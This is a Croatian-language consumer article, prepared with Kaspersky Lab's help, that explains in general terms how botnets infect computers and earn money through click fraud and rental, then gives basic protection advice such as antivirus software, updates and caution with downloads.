Kako bi se potencijalna žrtva natjerala da instalira bot, koriste se tehnike društvenog inženjeringa. Na primjer, nude gledanje zanimljivog videa, koji zahtijeva preuzimanje posebnog kodeka. Nakon preuzimanja i pokretanja takve datoteke, korisnik, naravno, neće moći gledati nikakav video i najvjerojatnije neće primijetiti nikakve promjene, a njegovo računalo bit će zaraženo i postati ponizni sluga koji izvršava sve naredbe gospodar botneta.

Druga široko korištena metoda zaraze botom je preuzimanje putem pogona. Kada korisnik posjeti zaraženu web stranicu, zloćudni kod se preuzima na njegovo računalo kroz razne “rupe” u aplikacijama – prvenstveno u popularnim preglednicima. Za iskorištavanje slabih točaka koriste se posebni programi - exploiti. Omogućuju ne samo tiho preuzimanje, već i tiho pokretanje virusa ili bota. Ova vrsta distribucije zlonamjernog softvera je najopasnija, jer ako se popularni resurs hakira, deseci tisuća korisnika bit će zaraženi!

Bot može biti obdaren funkcijom samopropagiranja kroz računalne mreže. Na primjer, može se širiti zarazom svih dostupnih izvršnih datoteka ili traženjem i zarazom ranjivih mrežnih računala.

Kreator botneta može kontrolirati zaražena računala korisnika koji ništa ne sumnjaju koristeći naredbeni centar botneta, kontaktirajući botove putem IRC kanala, web veze ili bilo kojeg drugog dostupnog načina. Dovoljno je spojiti nekoliko desetaka strojeva u mrežu da botnet počne donositi prihod svom vlasniku. Štoviše, ovaj prihod linearno ovisi o stabilnosti zombi mreže i stopi njenog rasta.

Oglašivačke tvrtke koje rade na mreži prema shemi PPC (Pay-per-Click) plaćaju novac za jedinstvene klikove na poveznice na oglasima objavljenim na Internetu. Za vlasnike botneta, prijevara takvih tvrtki je unosan posao. Uzmimo za primjer dobro poznatu Google AdSense mrežu. Oglašivači uključeni u njega plaćaju Googleu klikove na postavljene oglase u nadi da će korisnik koji je pogledao "na svjetlo" nešto kupiti od njih.

Google pak postavlja kontekstualno oglašavanje na različite web stranice koje sudjeluju u AdSense programu, plaćajući vlasniku web stranice postotak od svakog klika. Nažalost, nisu svi vlasnici stranica pošteni. Sa zombi mrežom, haker može generirati tisuće jedinstvenih klikova dnevno, po jedan sa svakog stroja, a da Google ne posumnja. Tako će novac potrošen na reklamnu kampanju teći u džep hakera. Nažalost, još nije zabilježen niti jedan slučaj da je netko za takve postupke odgovarao. Prema Click Forensicsu, 2008. godine oko 16-17% svih klikova na reklamne poveznice bili su lažni, od čega je najmanje trećina generirana botnetovima. Jednostavnim izračunima možete shvatiti da su prošle godine vlasnici botneta "ukucali" 33.000.000 dolara. Dobar prihod od klikova mišem!

Napadači i nepošteni poduzetnici ne moraju sami stvarati botnet od nule. Oni mogu kupiti ili iznajmiti botnete različitih veličina i performansi od hakera - na primjer, kontaktiranjem specijaliziranih foruma.

Trošak gotovog botneta, kao i trošak njegovog najma, izravno ovisi o broju računala uključenih u njega. Gotovi botneti najpopularniji su na forumima na engleskom jeziku.

Mali botnetovi, koji se sastoje od nekoliko stotina botova, koštaju između 200 i 700 dolara. Istovremeno, prosječna cijena jednog bota je oko 50 centi. Veći botneti koštaju više novca.

Zombie mreža Shadow koju je prije nekoliko godina stvorio 19-godišnji haker iz Nizozemske, imala je više od 100.000 računala diljem svijeta i prodavala se za 25.000 eura. Za taj novac možete kupiti malu kuću u Španjolskoj, ali kriminalac iz Brazila radije je kupio botnet.

Alati za zaštitu od botneta

1. Prije svega, to su antivirusni programi i sveobuhvatni paketi za zaštitu od internetskih prijetnji s redovito ažuriranim bazama podataka. Oni će vam pomoći ne samo da na vrijeme otkrijete opasnost, već i da je uklonite prije nego što vaš vjerni "željezni prijatelj" pretvoren u zombija počne slati neželjenu poštu ili "ispuštati" stranice. Sveobuhvatni paketi, kao što je Kaspersky Internet Security 2009, sadrže kompletan skup sigurnosnih značajki kojima se može upravljati putem zajedničkog naredbenog centra.

Antivirusni modul skenira najvažnija područja sustava u pozadini i prati sve moguće načine invazije virusa: privitke e-pošte i potencijalno opasne web stranice.

Vatrozid nadzire komunikaciju između osobnog računala i Interneta. Provjerava sve pakete podataka primljene s ili poslane na web i, ako je potrebno, blokira mrežne napade i sprječava tajno slanje privatnih podataka na internet.

Spam filter štiti vaš poštanski sandučić od reklamnih poruka. Njegovi zadaci uključuju i otkrivanje phishing e-mailova, uz pomoć kojih napadači pokušavaju izvući od korisnika podatke o njegovim podacima za prijavu u online sustave plaćanja ili bankovne sustave.

2. Redovita ažuriranja operativnog sustava, web preglednika i drugih aplikacija čiji programeri otkrivaju i uklanjaju mnoge nedostatke u njihovoj zaštiti, kao i slabosti kojima se koriste napadači.

3. Posebni programi za šifriranje zaštitit će vaše osobne podatke, čak i ako je bot već ušao u računalo, jer će za pristup njima morati probiti lozinku.

4. Zdrav razum i oprez. Ako želite zaštititi svoje podatke od raznih prijetnji, nemojte preuzimati i instalirati programe nepoznatog podrijetla, otvarati arhive s datotekama protivno antivirusnim upozorenjima, posjećivati ​​stranice koje preglednik označi kao opasne i sl.

Zahvaljujemo Kaspersky Labu na pomoći u pripremi materijala